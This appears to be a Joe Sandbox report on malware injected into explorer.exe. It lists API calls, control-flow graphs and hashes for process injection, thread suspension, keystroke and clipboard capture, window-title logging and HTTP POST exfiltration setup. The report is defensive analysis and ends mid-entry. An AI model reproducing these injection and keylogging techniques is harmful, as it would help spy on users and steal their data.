                                                                                                                                        • Opcode ID: 3ea750e8d140b45d30113fdee2ba468753e2acb2ee35e23134707040854f0f01
                                                                                                                                        • Instruction ID: 2f93006b057fbea492d2b312cc178e056bdd2f47052c10eb143eaf19be54a191
                                                                                                                                        • Opcode Fuzzy Hash: 3ea750e8d140b45d30113fdee2ba468753e2acb2ee35e23134707040854f0f01
                                                                                                                                        • Instruction Fuzzy Hash: 99F0126678072C37C22027AA7C0AE5BBE5CDB56FE63120261B614A32B1DBD5794046B4
                                                                                                                                        Function 001424D5 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 001424E7
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 001424EF
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 001424FF
                                                                                                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 0014250D
                                                                                                                                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0014252C
                                                                                                                                        • SuspendThread.KERNEL32(00000000), ref: 0014253C
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0014254B
                                                                                                                                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 0014255B
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00142566
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_141000_explorer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1467098526-0
                                                                                                                                        • Opcode ID: 9378d1729d7c7136b6ad6eab4a5cb7b95885e8195f54117cd89e861e50578307
                                                                                                                                        • Instruction ID: 3befea721f2bfd38e329ec5c5b91c005015d886216421ec061db0665d042650c
                                                                                                                                        • Opcode Fuzzy Hash: 9378d1729d7c7136b6ad6eab4a5cb7b95885e8195f54117cd89e861e50578307
                                                                                                                                        • Instruction Fuzzy Hash: 1A118E75404200EFD7119F60AC0CBAEBBA8FF86701F100629F655D7170D7308AC98BA2
                                                                                                                                        Function 00141F4A Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 281 141f4a-141fa5 call 1422b8 call 142861 call 1427e2 call 142374 290 141fa7-141fbe 281->290 291 141fc0-141fcc 281->291 294 141fd0-141fd2 290->294 291->294 295 1422a6-1422b5 call 142843 294->295 296 141fd8-14200f RtlZeroMemory 294->296 300 142015-142030 296->300 301 14229e-1422a5 296->301 302 142062-142074 300->302 303 142032-142043 call 1422e5 300->303 301->295 310 142078-14207a 302->310 308 142045-142054 303->308 309 142056 303->309 311 142058-142060 308->311 309->311 312 142080-1420dc call 142731 310->312 313 14228b-142291 310->313 311->310 321 142284 312->321 322 1420e2-1420e7 312->322 315 142293-142295 call 142843 313->315 316 14229a 313->316 315->316 316->301 321->313 323 142101-14212f call 142861 wsprintfW 322->323 324 1420e9-1420fa 322->324 327 142131-142133 323->327 328 142148-14215f 323->328 324->323 329 142134-142137 327->329 334 142161-142197 call 142861 wsprintfW 328->334 335 14219e-1421b8 328->335 330 142142-142144 329->330 331 142139-14213e 329->331 330->328 331->329 333 142140 331->333 333->328 334->335 339 142261-142277 call 142843 335->339 340 1421be-1421d1 335->340 348 142280 339->348 349 142279-14227b call 142843 339->349 340->339 343 1421d7-1421ed call 142861 340->343 351 1421ef-1421fa 343->351 348->321 349->348 352 1421fc-142209 call 142826 351->352 353 14220e-142225 351->353 352->353 357 142227 353->357 358 142229-142236 353->358 357->358 358->351 359 142238-14223c 358->359 360 142256-14225d call 142843 359->360 361 14223e 359->361 360->339 362 14223e call 142815 361->362 364 142243-142250 RtlMoveMemory 362->364 364->360
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00142861: GetProcessHeap.KERNEL32(00000008,0000A000,001410CC), ref: 00142864
                                                                                                                                          • Part of subcall function 00142861: RtlAllocateHeap.NTDLL(00000000), ref: 0014286B
                                                                                                                                          • Part of subcall function 001427E2: lstrlen.KERNEL32(001440DA,?,00000000,00000000,00141F86,74DE8A60,001440DA,00000000), ref: 001427EA
                                                                                                                                          • Part of subcall function 001427E2: MultiByteToWideChar.KERNEL32(00000000,00000000,001440DA,00000001,00000000,00000000), ref: 001427FC
                                                                                                                                          • Part of subcall function 00142374: RtlZeroMemory.NTDLL(?,00000018), ref: 00142386
                                                                                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 00141FE2
                                                                                                                                        • wsprintfW.USER32 ref: 0014211B
                                                                                                                                        • wsprintfW.USER32 ref: 00142186
                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00142250
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_141000_explorer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                                        • API String ID: 4204651544-1701262698
                                                                                                                                        • Opcode ID: f18c2778dadabfae572720b8b00f3f5ecd1afbb659c1831f9253271992de4d4c
                                                                                                                                        • Instruction ID: 345907f8c53750eab34a0dbe5d670a1232b0004e96984397bff63189daed8a43
                                                                                                                                        • Opcode Fuzzy Hash: f18c2778dadabfae572720b8b00f3f5ecd1afbb659c1831f9253271992de4d4c
                                                                                                                                        • Instruction Fuzzy Hash: 35A16875608301AFD720DF68D885A2FBBE8AB99740F50092DF995D3271DB70DA848B62
                                                                                                                                        Function 001425AD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 366 1425ad-1425c9 OpenProcess 367 142600-142607 366->367 368 1425cb-1425da IsWow64Process 366->368 369 1425f7 368->369 370 1425dc-1425ec IsWow64Process 368->370 372 1425f9-1425fa CloseHandle 369->372 371 1425ee-1425f5 370->371 370->372 371->372 372->367
                                                                                                                                        APIs
                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,74DEE800,?,?,microsoftedgecp.exe,00141287), ref: 001425BF
                                                                                                                                        • IsWow64Process.KERNEL32(000000FF,?), ref: 001425D1
                                                                                                                                        • IsWow64Process.KERNEL32(00000000,?), ref: 001425E4
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 001425FA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_141000_explorer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                        • String ID: microsoftedgecp.exe
                                                                                                                                        • API String ID: 331459951-1475183003
                                                                                                                                        • Opcode ID: 96575270710c45fdef7c0448f299781a83eda711e6678c48e365be49451f61e8
                                                                                                                                        • Instruction ID: 85f6cfab369b637923fe0198a007771ef9b2936c5095f6918d92a65f37878cc6
                                                                                                                                        • Opcode Fuzzy Hash: 96575270710c45fdef7c0448f299781a83eda711e6678c48e365be49451f61e8
                                                                                                                                        • Instruction Fuzzy Hash: C1F09075902218FF9B10CF909D98CEE776CEB02255B54036AF91093160D7314F84E6A0

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:8.8%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:9
                                                                                                                                        Total number of Limit Nodes:2
                                                                                                                                        execution_graph 765 779fab 766 779fd8 765->766 768 779ff8 765->768 769 77a048 766->769 773 77a04d 769->773 770 77a135 LoadLibraryA 770->773 771 77a190 VirtualProtect VirtualProtect 772 77a1e8 771->772 772->772 773->770 773->771 774 77a185 773->774 774->768

                                                                                                                                        Callgraph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        • Opacity -> Relevance
                                                                                                                                        • Disassembly available
                                                                                                                                        callgraph 0 Function_00771576 1 Function_00772BF4 2 Function_00772774 3 Function_00771B70 4 Function_00771E70 5 Function_00772B70 32 Function_00771838 5->32 50 Function_00771A04 5->50 6 Function_007730F0 12 Function_00771860 6->12 25 Function_00771C58 6->25 6->32 56 Function_00771A88 6->56 58 Function_00772508 6->58 7 Function_007725FC 8 Function_007714F9 9 Function_007718F8 10 Function_00772860 10->2 10->3 39 Function_00772620 10->39 11 Function_00771560 12->3 13 Function_007724E0 14 Function_0077156C 15 Function_007718E8 16 Function_0077B0D5 17 Function_00771254 18 Function_007714D4 19 Function_00771DD4 19->32 20 Function_00772054 20->4 20->9 20->12 21 Function_007718D0 20->21 28 Function_00771F40 20->28 20->32 33 Function_00771938 20->33 45 Function_00772010 20->45 53 Function_0077188C 20->53 22 Function_00771D50 22->32 23 Function_0077355C 23->3 23->6 23->23 23->32 38 Function_00773220 23->38 24 Function_00774059 26 Function_007725C4 26->7 27 Function_00774A41 28->9 28->32 29 Function_0077A048 54 Function_0077A00A 29->54 30 Function_007714B2 31 Function_00771BB0 34 Function_00772CB8 34->12 34->32 40 Function_00771D20 34->40 35 Function_007745A7 36 Function_00771822 37 Function_007741A1 38->3 38->10 38->31 38->32 38->33 43 Function_00771C28 38->43 57 Function_00771C08 38->57 41 Function_00773020 41->3 48 Function_00772E98 41->48 42 Function_00779FAB 42->29 44 Function_0077B115 45->50 46 Function_0077141D 47 Function_00772418 47->12 47->20 47->32 48->1 48->5 48->19 48->34 48->50 59 Function_00772E08 48->59 49 Function_00771405 51 Function_00771000 52 Function_00772E80 53->32 55 Function_00771508 58->13 58->21 58->26 59->12 59->15 59->22 59->47 60 Function_00773088 60->3 60->48

                                                                                                                                        Executed Functions

                                                                                                                                        Function 0077355C Relevance: 1.6, APIs: 1, Instructions: 73nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 119 77355c-77356c call 771b70 122 773572-7735a5 call 771838 119->122 123 7735fc-773601 119->123 127 7735a7 call 771838 122->127 128 7735d1-7735f6 NtUnmapViewOfSection 122->128 130 7735ac-7735c5 127->130 132 773608-773617 call 773220 128->132 133 7735f8-7735fa 128->133 130->128 139 773621-77362a 132->139 140 773619-77361c call 77355c 132->140 133->123 135 773602-773607 call 7730f0 133->135 135->132 140->139
                                                                                                                                        APIs
                                                                                                                                        • NtUnmapViewOfSection.NTDLL ref: 007735D8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000012.00000002.4123114957.0000000000771000.00000040.80000000.00040000.00000000.sdmp, Offset: 00771000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_18_2_771000_explorer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SectionUnmapView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 498011366-0
                                                                                                                                        • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                                        • Instruction ID: 73de265d2fd155b89473184314cd049e79995ad05f42afc80c7ec7a6f719380e
                                                                                                                                        • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                                        • Instruction Fuzzy Hash: 0311C430711A099FEF58BBBC989E67937A1FB14341F54812AA41DC76A1DA3D8A40C701
                                                                                                                                        Function 00773220 Relevance: 7.7, APIs: 5, Instructions: 241processCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 0 773220-77325b call 771838 3 773261-773273 CreateToolhelp32Snapshot 0->3 4 773549-773554 SleepEx 3->4 5 773279-77328f Process32First 3->5 4->3 6 773538-77353a 5->6 7 773294-7732ac 6->7 8 773540-773543 CloseHandle 6->8 10 7732b2-7732c6 7->10 11 77348c-773495 call 771bb0 7->11 8->4 10->11 15 7732cc-7732e0 10->15 16 77349b-7734a4 call 771c08 11->16 17 77352a-773532 Process32Next 11->17 15->11 22 7732e6-7732fa 15->22 16->17 21 7734aa-7734b1 call 771c28 16->21 17->6 21->17 26 7734b3-7734c1 call 771b70 21->26 22->11 27 773300-773314 22->27 26->17 31 7734c3-773525 call 771938 call 772860 call 771938 26->31 27->11 32 77331a-77332e 27->32 31->17 32->11 35 773334-773348 32->35 35->11 40 77334e-773362 35->40 40->11 44 773368-77337c 40->44 44->11 46 773382-773396 44->46 46->11 48 77339c-7733b0 46->48 48->11 50 7733b6-7733ca 48->50 50->11 52 7733d0-7733e4 50->52 52->11 54 7733ea-7733fe 52->54 54->11 56 773404-773418 54->56 56->11 58 77341a-77342e 56->58 58->11 60 773430-773444 58->60 60->11 62 773446-77345a 60->62 62->11 64 77345c-773470 62->64 64->11 66 773472-773486 64->66 66->11 66->17
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000012.00000002.4123114957.0000000000771000.00000040.80000000.00040000.00000000.sdmp, Offset: 00771000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_18_2_771000_explorer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2482764027-0
                                                                                                                                        • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                                                        • Instruction ID: 57fbfd9eae7bac2701c0fffb4ceaa8801eee6624a4a28eae3a27f9e96fdd021d
                                                                                                                                        • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                                                        • Instruction Fuzzy Hash: 0F8135312187488FEB1ADF64EC58BEAB7A1FB51780F54862A9447C7160EF7CDA04DB81
                                                                                                                                        Function 0077A048 Relevance: 4.7, APIs: 3, Instructions: 223memorylibraryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 68 77a048-77a04b 69 77a055-77a059 68->69 70 77a065 69->70 71 77a05b-77a063 69->71 72 77a067 70->72 73 77a04d-77a053 70->73 71->70 74 77a06a-77a071 72->74 73->69 76 77a073-77a07b 74->76 77 77a07d 74->77 76->77 77->74 78 77a07f-77a082 77->78 79 77a097-77a0a4 78->79 80 77a084-77a092 78->80 90 77a0a6-77a0a8 79->90 91 77a0be-77a0cc call 77a00a 79->91 81 77a094-77a095 80->81 82 77a0ce-77a0e9 80->82 81->79 84 77a11a-77a11d 82->84 85 77a122-77a129 84->85 86 77a11f-77a120 84->86 89 77a12f-77a133 85->89 88 77a101-77a105 86->88 92 77a107-77a10a 88->92 93 77a0eb-77a0ee 88->93 94 77a135-77a14e LoadLibraryA 89->94 95 77a190-77a1e4 VirtualProtect * 2 89->95 96 77a0ab-77a0b2 90->96 91->69 92->85 97 77a10c-77a110 92->97 93->85 101 77a0f0 93->101 100 77a14f-77a156 94->100 98 77a1e8-77a1ed 95->98 113 77a0b4-77a0ba 96->113 114 77a0bc 96->114 102 77a112-77a119 97->102 103 77a0f1-77a0f5 97->103 98->98 104 77a1ef-77a1fe 98->104 100->89 106 77a158 100->106 101->103 102->84 103->88 107 77a0f7-77a0f9 103->107 110 77a164-77a16c 106->110 111 77a15a-77a162 106->111 107->88 112 77a0fb-77a0ff 107->112 115 77a16e-77a17a 110->115 111->115 112->88 112->92 113->114 114->91 114->96 117 77a185-77a18f 115->117 118 77a17c-77a183 115->118 118->100
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNELBASE ref: 0077A147
                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 0077A1BB
                                                                                                                                        • VirtualProtect.KERNELBASE ref: 0077A1D9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000012.00000002.4123114957.0000000000777000.00000040.80000000.00040000.00000000.sdmp, Offset: 00777000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_18_2_777000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 895956442-0
                                                                                                                                        • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                                                        • Instruction ID: f2ccead5af2106c5ba01ca93e5c0d365f8b6830ab99de6d187fd4ab9fec633d1
                                                                                                                                        • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                                                        • Instruction Fuzzy Hash: 4C518B3135891D5AFF24AA389CC46BDB3D1E795365F544A3AD08EC3285F91DD846C383

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:9.6%
                                                                                                                                        Dynamic/Decrypted Code Coverage:97.5%
                                                                                                                                        Signature Coverage:17.7%
                                                                                                                                        Total number of Nodes:322
                                                                                                                                        Total number of Limit Nodes:4
                                                                                                                                        execution_graph 1017 2ef182d 1018 2ef1838 RtlEnterCriticalSection lstrlenW 1017->1018 1019 2ef18a8 RtlLeaveCriticalSection Sleep 1018->1019 1022 2ef1854 1018->1022 1019->1018 1022->1019 1025 2ef29eb VirtualQuery GetProcessHeap HeapFree 1022->1025 1026 2ef25a4 1022->1026 1032 2ef200d 1022->1032 1043 2ef29ae VirtualFree 1022->1043 1044 2ef2a09 GetProcessHeap RtlAllocateHeap 1022->1044 1025->1022 1027 2ef25b9 CryptBinaryToStringA 1026->1027 1028 2ef25e8 1026->1028 1027->1028 1029 2ef25cc 1027->1029 1028->1022 1045 2ef2a09 GetProcessHeap RtlAllocateHeap 1029->1045 1031 2ef25d7 CryptBinaryToStringA 1031->1028 1033 2ef2023 lstrlen 1032->1033 1034 2ef2030 1032->1034 1033->1034 1046 2ef2a09 GetProcessHeap RtlAllocateHeap 1034->1046 1036 2ef2038 lstrcat 1037 2ef206d lstrcat 1036->1037 1038 2ef2074 1036->1038 1037->1038 1047 2ef20a1 1038->1047 1041 2ef29eb 3 API calls 1042 2ef2097 1041->1042 1042->1022 1043->1022 1044->1022 1045->1031 1046->1036 1081 2ef240f 1047->1081 1051 2ef20ce 1086 2ef298a lstrlen MultiByteToWideChar 1051->1086 1053 2ef20dd 1087 2ef24cc RtlZeroMemory 1053->1087 1056 2ef212f RtlZeroMemory 1058 2ef2164 1056->1058 1057 2ef29eb 3 API calls 1059 2ef2084 1057->1059 1062 2ef23f1 1058->1062 1064 2ef2192 1058->1064 1089 2ef243d 1058->1089 1059->1041 1061 2ef23d7 1061->1062 1063 2ef29eb 3 API calls 1061->1063 1062->1057 1063->1062 1064->1061 1098 2ef2a09 GetProcessHeap RtlAllocateHeap 1064->1098 1066 2ef2262 wsprintfW 1067 2ef2288 1066->1067 1071 2ef22f5 1067->1071 1099 2ef2a09 GetProcessHeap RtlAllocateHeap 1067->1099 1069 2ef22c2 wsprintfW 1069->1071 1070 2ef23b4 1072 2ef29eb 3 API calls 1070->1072 1071->1070 1100 2ef2a09 GetProcessHeap RtlAllocateHeap 1071->1100 1074 2ef23c8 1072->1074 1074->1061 1075 2ef29eb 3 API calls 1074->1075 1075->1061 1076 2ef23ad 1078 2ef29eb 3 API calls 1076->1078 1077 2ef2340 1077->1076 1101 2ef29bd VirtualAlloc 1077->1101 1078->1070 1080 2ef239a RtlMoveMemory 1080->1076 1082 2ef2419 1081->1082 1084 2ef20c0 1081->1084 1083 2ef2841 2 API calls 1082->1083 1083->1084 1085 2ef2a09 GetProcessHeap RtlAllocateHeap 1084->1085 1085->1051 1086->1053 1088 2ef20ed 1087->1088 1088->1056 1088->1062 1090 2ef24ab 1089->1090 1092 2ef244a 1089->1092 1090->1064 1091 2ef244e DnsQuery_W 1091->1092 1092->1090 1092->1091 1093 2ef248d DnsFree inet_ntoa 1092->1093 1093->1092 1094 2ef24ad 1093->1094 1102 2ef2a09 GetProcessHeap RtlAllocateHeap 1094->1102 1096 2ef24b7 1103 2ef298a lstrlen MultiByteToWideChar 1096->1103 1098->1066 1099->1069 1100->1077 1101->1080 1102->1096 1103->1090 1104 2ef162b 1105 2ef163c 1104->1105 1110 2ef16aa 1104->1110 1106 2ef164b GetKeyboardState 1105->1106 1105->1110 1107 2ef165c ToUnicode 1106->1107 1106->1110 1108 2ef1684 1107->1108 1108->1110 1111 2ef16b9 RtlEnterCriticalSection 1108->1111 1112 2ef17ce RtlLeaveCriticalSection 1111->1112 1113 2ef16d2 lstrlenW 1111->1113 1112->1110 1114 2ef16ed lstrlenW 1113->1114 1115 2ef17bd 1113->1115 1116 2ef1702 1114->1116 1115->1112 1117 2ef174e GetForegroundWindow 1116->1117 1118 2ef1723 1116->1118 1117->1115 1119 2ef175a GetWindowTextW 1117->1119 1118->1115 1130 2ef17dc 1118->1130 1121 2ef177a lstrcmpW 1119->1121 1122 2ef1771 GetClassNameW 1119->1122 1124 2ef17bf lstrcatW 1121->1124 1125 2ef178b lstrcpyW 1121->1125 1122->1121 1123 2ef172f wsprintfW 1126 2ef17b6 1123->1126 1124->1115 1127 2ef17dc 4 API calls 1125->1127 1129 2ef29eb 3 API calls 1126->1129 1128 2ef1798 wsprintfW 1127->1128 1128->1126 1129->1115 1133 2ef2a09 GetProcessHeap RtlAllocateHeap 1130->1133 1132 2ef17ed GetLocalTime wsprintfW 1132->1123 1133->1132 1134 2ef1581 1135 2ef158e 1134->1135 1136 2ef1623 1135->1136 1137 2ef15a7 GlobalLock 1135->1137 1137->1136 1138 2ef15b5 1137->1138 1139 2ef15e4 1138->1139 1140 2ef15c0 1138->1140 1155 2ef293e 1139->1155 1141 2ef15c5 lstrlenW 1140->1141 1142 2ef15f2 1140->1142 1154 2ef2a09 GetProcessHeap RtlAllocateHeap 1141->1154 1144 2ef2724 VirtualQuery 1142->1144 1146 2ef15fb 1144->1146 1148 2ef15ff lstrlenW 1146->1148 1149 2ef161b GlobalUnlock 1146->1149 1147 2ef15d8 lstrcatW 1147->1142 1148->1149 1150 2ef160a 1148->1150 1149->1136 1151 2ef16b9 19 API calls 1150->1151 1152 2ef1614 1151->1152 1153 2ef29eb 3 API calls 1152->1153 1153->1149 1154->1147 1156 2ef294d lstrlen 1155->1156 1157 2ef2982 1155->1157 1162 2ef2a09 GetProcessHeap RtlAllocateHeap 1156->1162 1157->1142 1159 2ef2963 MultiByteToWideChar 1159->1157 1160 2ef297b 1159->1160 1161 2ef29eb 3 API calls 1160->1161 1161->1157 1162->1159 770 2ef9ae0 771 2ef9ca4 770->771 772 2ef9aeb 770->772 771->771 773 2ef9bfa LoadLibraryA 772->773 777 2ef9c3f VirtualProtect VirtualProtect 772->777 774 2ef9c11 773->774 774->772 776 2ef9c23 GetProcAddress 774->776 776->774 778 2ef9c39 776->778 777->771 779 2ef1000 780 2ef1007 779->780 781 2ef1010 779->781 783 2ef1016 780->783 823 2ef2724 VirtualQuery 783->823 785 2ef1098 785->781 788 2ef102c RtlMoveMemory 789 2ef104d 788->789 790 2ef1072 NtUnmapViewOfSection GetCurrentProcessId 788->790 851 2ef2a09 GetProcessHeap RtlAllocateHeap 789->851 792 2ef109f 790->792 793 2ef1093 790->793 826 2ef10a5 792->826 793->785 796 2ef1096 793->796 795 2ef1053 RtlMoveMemory 795->790 852 2ef13ae RtlZeroMemory VirtualQuery 796->852 797 2ef10a4 799 2ef2a09 GetProcessHeap RtlAllocateHeap 797->799 800 2ef10bf 799->800 801 2ef2a09 GetProcessHeap RtlAllocateHeap 800->801 802 2ef10cc wsprintfA 801->802 806 2ef10f3 802->806 803 2ef276d OpenFileMappingA MapViewOfFile 803->806 804 2ef129a Sleep 804->806 805 2ef2841 lstrlen lstrlen 805->806 806->803 806->804 806->805 807 2ef275a UnmapViewOfFile CloseHandle 806->807 810 2ef1148 806->810 807->804 808 2ef2a09 GetProcessHeap RtlAllocateHeap 809 2ef1150 RtlMoveMemory CreateToolhelp32Snapshot 808->809 809->810 811 2ef1171 Process32First 809->811 810->806 810->808 812 2ef29eb VirtualQuery GetProcessHeap HeapFree 810->812 813 2ef127e CloseHandle 810->813 817 2ef1266 Process32Next 810->817 818 2ef12ae 16 API calls 810->818 819 2ef26c9 OpenProcess IsWow64Process IsWow64Process CloseHandle 810->819 820 2ef2724 VirtualQuery 810->820 821 2ef1208 lstrcmpiA 810->821 822 2ef18bf 30 API calls 810->822 811->813 814 2ef118d 811->814 812->810 813->810 815 2ef1190 CharLowerA 814->815 816 2ef11ab lstrcmpiA 815->816 815->817 816->810 816->817 817->810 817->815 818->810 819->810 820->810 821->810 822->810 824 2ef101e 823->824 824->785 825 2ef2a09 GetProcessHeap RtlAllocateHeap 824->825 825->788 881 2ef2a09 GetProcessHeap RtlAllocateHeap 826->881 828 2ef10bf 882 2ef2a09 GetProcessHeap RtlAllocateHeap 828->882 830 2ef10cc wsprintfA 834 2ef10f3 830->834 832 2ef129a Sleep 832->834 833 2ef2841 lstrlen lstrlen 833->834 834->832 834->833 849 2ef1148 834->849 883 2ef276d OpenFileMappingA 834->883 948 2ef275a UnmapViewOfFile CloseHandle 834->948 837 2ef1150 RtlMoveMemory CreateToolhelp32Snapshot 838 2ef1171 Process32First 837->838 837->849 840 2ef127e CloseHandle 838->840 841 2ef118d 838->841 840->849 842 2ef1190 CharLowerA 841->842 843 2ef11ab lstrcmpiA 842->843 844 2ef1266 Process32Next 842->844 843->844 843->849 844->842 844->849 847 2ef2724 VirtualQuery 847->849 848 2ef1208 lstrcmpiA 848->849 849->834 849->840 849->844 849->847 849->848 886 2ef2a09 GetProcessHeap RtlAllocateHeap 849->886 887 2ef12ae 849->887 906 2ef26c9 OpenProcess 849->906 912 2ef18bf 849->912 943 2ef29eb 849->943 851->795 853 2ef13e4 852->853 973 2ef2a09 GetProcessHeap RtlAllocateHeap 853->973 855 2ef1402 GetModuleFileNameA 974 2ef2a09 GetProcessHeap RtlAllocateHeap 855->974 857 2ef1418 GetCurrentProcessId wsprintfA 975 2ef2799 CryptAcquireContextA 857->975 860 2ef145f RtlInitializeCriticalSection 980 2ef2a09 GetProcessHeap RtlAllocateHeap 860->980 861 2ef151b 862 2ef29eb 3 API calls 861->862 864 2ef1522 862->864 866 2ef29eb 3 API calls 864->866 865 2ef147f Sleep 981 2ef25f1 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 865->981 868 2ef1529 RtlExitUserThread 866->868 878 2ef1533 868->878 869 2ef1496 GetModuleHandleA GetProcAddress 870 2ef14c6 GetModuleHandleA GetProcAddress 869->870 871 2ef14b5 869->871 873 2ef14ea GetModuleHandleA 870->873 874 2ef14d9 870->874 989 2ef1f3a 871->989 999 2ef1e89 873->999 875 2ef1f3a 3 API calls 874->875 875->873 878->792 879 2ef25f1 10 API calls 880 2ef1501 CreateThread CloseHandle 879->880 880->861 881->828 882->830 884 2ef2794 883->884 885 2ef2781 MapViewOfFile 883->885 884->834 885->884 886->837 888 2ef12c5 887->888 901 2ef13a4 887->901 888->901 949 2ef29bd VirtualAlloc 888->949 890 2ef12d9 lstrlen 950 2ef2a09 GetProcessHeap RtlAllocateHeap 890->950 893 2ef29eb 3 API calls 894 2ef1375 893->894 903 2ef1388 PathMatchSpecA 894->903 905 2ef1399 894->905 896 2ef1329 RtlMoveMemory 953 2ef2569 896->953 897 2ef1353 RtlMoveMemory 900 2ef2569 2 API calls 897->900 904 2ef1351 900->904 901->849 902 2ef12f0 902->904 951 2ef2841 lstrlen lstrlen 902->951 903->894 903->905 904->893 957 2ef29ae VirtualFree 905->957 907 2ef271c 906->907 908 2ef26e7 IsWow64Process 906->908 907->849 909 2ef26f8 IsWow64Process 908->909 910 2ef270a 908->910 909->910 911 2ef2715 CloseHandle 909->911 910->911 911->907 913 2ef2724 VirtualQuery 912->913 914 2ef18d9 913->914 915 2ef18eb OpenProcess 914->915 916 2ef1b1c 914->916 915->916 917 2ef1904 915->917 916->849 918 2ef2724 VirtualQuery 917->918 919 2ef190b 918->919 919->916 920 2ef1919 NtSetInformationProcess 919->920 921 2ef1935 919->921 920->921 958 2ef1b26 921->958 924 2ef1b26 2 API calls 925 2ef197c 924->925 926 2ef1b19 CloseHandle 925->926 927 2ef1b26 2 API calls 925->927 926->916 928 2ef19a6 927->928 964 2ef1bbd 928->964 931 2ef1b26 2 API 